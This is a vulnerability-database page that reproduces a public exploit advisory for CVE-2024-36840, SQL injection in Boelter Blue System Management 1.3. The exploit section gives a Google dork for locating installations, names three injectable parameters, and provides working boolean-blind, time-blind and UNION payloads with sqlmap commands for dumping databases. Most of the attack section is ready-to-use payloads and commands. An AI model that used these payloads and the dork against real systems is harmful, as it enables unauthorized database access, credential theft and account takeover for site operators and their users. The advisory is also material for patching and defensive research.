Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Boelter Blue System Management 1.3 SQL Injection

🗓️ 06 Jun 2024 00:00:00Reported by CBKB, R4d1x, deadlydataType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 1377 Views

Boelter Blue System Management 1.3 SQL Injection Vulnerability 2024-06-0

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Boelter Blue System Management 1.3 - SQL Injection Vulnerability
14 Jun 202400:00
zdt
Circl		CVE-2024-36840
5 Aug 202416:59
circl
CNNVD		Boelter Blue System Management SQL Injection Vulnerability
7 Jun 202400:00
cnnvd
CVE		CVE-2024-36840
12 Jun 202400:00
cve
Cvelist		CVE-2024-36840
12 Jun 202400:00
cvelist
Exploit DB		Boelter Blue System Management 1.3 - SQL Injection
14 Jun 202400:00
exploitdb
NVD		CVE-2024-36840
12 Jun 202415:15
nvd
Positive Technologies		PT-2024-27176 · Unknown · Boelter Blue System Management
12 Jun 202400:00
ptsecurity
RedhatCVE		CVE-2024-36840
23 May 202509:19
redhatcve
Vulnrichment		CVE-2024-36840
12 Jun 202400:00
vulnrichment
Rows per page
`Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)  
Google Dork: inurl:"Powered by Boelter Blue"  
Date: 2024-06-04  
Exploit Author: CBKB (DeadlyData, R4d1x)  
Vendor Homepage: https://www.boelterblue.com  
Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US  
Version: 1.3  
Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12  
CVE: CVE-2024-36840  
  
Vulnerability Details:  
Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.  
  
PoC:  
web server operating system: Linux Debian 9 (stretch)  
web application technology: Apache 2.4.25  
back-end DBMS: MySQL >= 5.0.12  
[22:21:39] [INFO] fetching database names  
available databases [5]:  
[*] Anchor5Digital  
  
1. news_details.php?id parameter:  
  
Type: Boolean-based blind  
Payload: id=10071 AND 4036=4036  
  
Type: Time-based blind  
Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)  
  
Type: UNION query  
Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--  
  
Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs  
  
2. services.php?section parameter:  
  
Type: Boolean-based blind  
Payload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))  
  
Type: Time-based blind  
Payload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)  
  
Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs  
  
3. location_details.php?id parameter:  
  
Type: Boolean-based blind  
Payload: id=836 AND 4036=4036  
  
Type: Time-based blind  
Payload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)  
  
Type: UNION query  
Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--  
  
Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs  
  
Impact:  
Unauthorized access to the database.  
Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.  
Account takeovers and potential full control of the affected application.  
  
Discoverer(s)/Credits:  
CBKB (DeadlyData, R4d1x)  
  
References:  
https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.11554
sql injectionboelter blue managementcve-2024-36840linux debian 9apache 2.4.25mysql 5.0.12unauthorized access
1377